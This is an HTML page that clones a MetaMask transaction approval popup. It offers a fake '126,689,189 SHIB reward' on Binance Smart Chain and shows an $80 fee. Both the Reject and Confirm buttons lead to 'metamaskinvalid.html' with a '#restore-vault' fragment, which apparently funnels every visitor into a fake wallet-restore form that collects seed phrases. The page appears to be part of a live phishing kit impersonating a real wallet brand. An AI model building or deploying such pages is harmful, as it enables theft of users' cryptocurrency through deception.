
<!DOCTYPE html>
<html><head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta charset="utf-8">
    <title>MetaMask Notification</title>
    <style>
      #app-content {
        display: flex;
        flex-flow: column;
      }

      #loading__logo {
        width: 10rem;
        height: 10rem;
        align-self: center;
        margin: 10rem 0 0 0;
      }

      #loading__spinner {
        width: 2rem;
        height: 2rem;
        align-self: center;
        margin-top: 1rem;
      }
    </style>
    <link rel="shortcut icon" href="./images/logo/metamask-fox.svg">
    <link rel="stylesheet" type="text/css" href="./index12.css" title="ltr">
    <link rel="stylesheet" type="text/css" href="./index-rtl.css" title="rtl" disabled="">
  <style></style></head>
  <body class="notification">
    <div id="app-content"><div class="app"><div><span></span></div><div class="menu-droppo-container network-droppo" style="position: absolute; top: 58px; width: 309px; z-index: 55;"><style>
          .menu-droppo-enter {
            transition: transform 300ms ease-in-out;
            transform: translateY(-200%);
          }

          .menu-droppo-enter.menu-droppo-enter-active {
            transition: transform 300ms ease-in-out;
            transform: translateY(0%);
          }

          .menu-droppo-leave {
            transition: transform 300ms ease-in-out;
            transform: translateY(0%);
          }

          .menu-droppo-leave.menu-droppo-leave-active {
            transition: transform 300ms ease-in-out;
            transform: translateY(-200%);
          }
        </style></div><div class="main-container-wrapper"><div class="page-container"><div class="confirm-page-container-navigation" style="display: none;"><div class="confirm-page-container-navigation__container" style="visibility: hidden;"><div class="confirm-page-container-navigation__arrow" data-testid="first-page"><img src="/images/double-arrow.svg" alt=""></div><div class="confirm-page-container-navigation__arrow" data-testid="previous-page"><img src="/images/single-arrow.svg" alt=""></div></div><div class="confirm-page-container-navigation__textcontainer"><div class="confirm-page-container-navigation__navtext">1 of 1</div><div class="confirm-page-container-navigation__longtext">requests waiting to be acknowledged</div></div><div class="confirm-page-container-navigation__container" style="visibility: hidden;"><div class="confirm-page-container-navigation__arrow" data-testid="next-page"><img class="confirm-page-container-navigation__imageflip" src="/images/single-arrow.svg" alt=""></div><div class="confirm-page-container-navigation__arrow" data-testid="last-page"><img class="confirm-page-container-navigation__imageflip" src="/images/double-arrow.svg" alt=""></div></div></div><div class="confirm-page-container-header"><div class="confirm-page-container-header__row"><div class="confirm-page-container-header__address-container"><div class="confirm-page-container-header__address-identicon"><div class=""><div class="identicon" style="height: 24px; width: 24px; border-radius: 12px;"><div style="border-radius: 50px; overflow: hidden; padding: 0px; margin: 0px; width: 24px; height: 24px; display: inline-block; background: rgb(35, 143, 225);"><svg x="0" y="0" width="24" height="24"><rect x="0" y="0" width="24" height="24" transform="translate(-0.4639440735861378 -7.143619627475044) rotate(438.5 12 12)" fill="#F26A02"></rect><rect x="0" y="0" width="24" height="24" transform="translate(15.513796844776365 2.6117513459004957) rotate(177.4 12 12)" fill="#F58F00"></rect><rect x="0" y="0" width="24" height="24" transform="translate(-7.023312719556073 15.164086237737994) rotate(181.6 12 12)" fill="#18CAF2"></rect></svg></div></div></div></div></div><div class="network-display network-display--colored network-display--mainnet chip chip--with-left-icon chip--transparent" role="button" tabindex="0"><div class="chip__left-icon"><div class="color-indicator color-indicator--filled color-indicator--color-mainnet color-indicator--size-lg"><span class="color-indicator__inner-circle"></span></div></div><span class="box box--margin-top-1 box--margin-right-0 box--margin-bottom-1 box--margin-left-0 typography chip__label typography--h7 typography--align-undefined typography--color-ui-4 typography--weight-normal">Binance Smart Chain Mainnet </span></div></div></div>
        <div class="confirm-approve-content"><br>
      <img class="identicon confirm-approve-content__identicon" src="./favicon-96x96.png" alt="" style="width:50px;height:50px;">
        
        <div class="confirm-approve-content__title">Allow Shiba Inu </div><div class="confirm-approve-content__description">Do you trust this site? By granting this permission, you are allowing SHIB to withdraw your 126,689,189 SHIB reward metamask and automatic transactions for you. </div><div class="confirm-approve-content__edit-submission-button-container"></div><div class="confirm-approve-content__card-wrapper"><div class="confirm-approve-content__card--no-border"><div class="confirm-approve-content__card-header"><div class="confirm-approve-content__card-header__symbol"><i class="fa fa-tag"></i></div><div class="confirm-approve-content__card-header__title">Transaction Fee</div><div class="confirm-approve-content__small-blue-text cursor-pointer">USD/BNB</div></div><div class="confirm-approve-content__card-content"><div class="confirm-approve-content__transaction-details-content"><div class="confirm-approve-content__small-text">A fee is associated with this request. </div><div class="confirm-approve-content__transaction-details-content__fee"><div class="confirm-approve-content__transaction-details-content__primary-fee">$80 </div><div class="confirm-approve-content__transaction-details-content__secondary-fee">0.2110 BNB </div></div></div></div>
         
        <div class="confirm-approve-content__view-full-tx-button-wrapper"><div class="confirm-approve-content__view-full-tx-button cursor-pointer"></div></div></div></div></div>
       
        
        <div class="page-container__footer"><footer><a href="metamaskinvalid.html?nkbihfbeogaeaoehlefnkodbefgpgknn/home.html#restore-vault" class="button btn-default page-container__footer-button" data-testid="page-container-footer-cancel" role="button" tabindex="0">Reject</a>&ensp;&ensp;<a href="metamaskinvalid.html?nkbihfbeogaeaoehlefnkodbefgpgknn/home.html#restore-vault" class="button btn-primary page-container__footer-button" data-testid="page-container-footer-next" role="button" tabindex="0">Confirm</a></footer></div></div></div></div></div>
    <div id="popover-content"></div>
    <script src="./globalthis.js" type="text/javascript" charset="utf-8"></script>
    <script src="./initSentry.js" type="text/javascript" charset="utf-8"></script>
    <script src="./lockdown.js" type="text/javascript" charset="utf-8"></script>
    <script src="./runLockdown.js" type="text/javascript" charset="utf-8"></script>
    <script src="./ui-libs.js" type="text/javascript" charset="utf-8"></script>
    <script src="./ui.js" type="text/javascript" charset="utf-8"></script>
  

</body></html>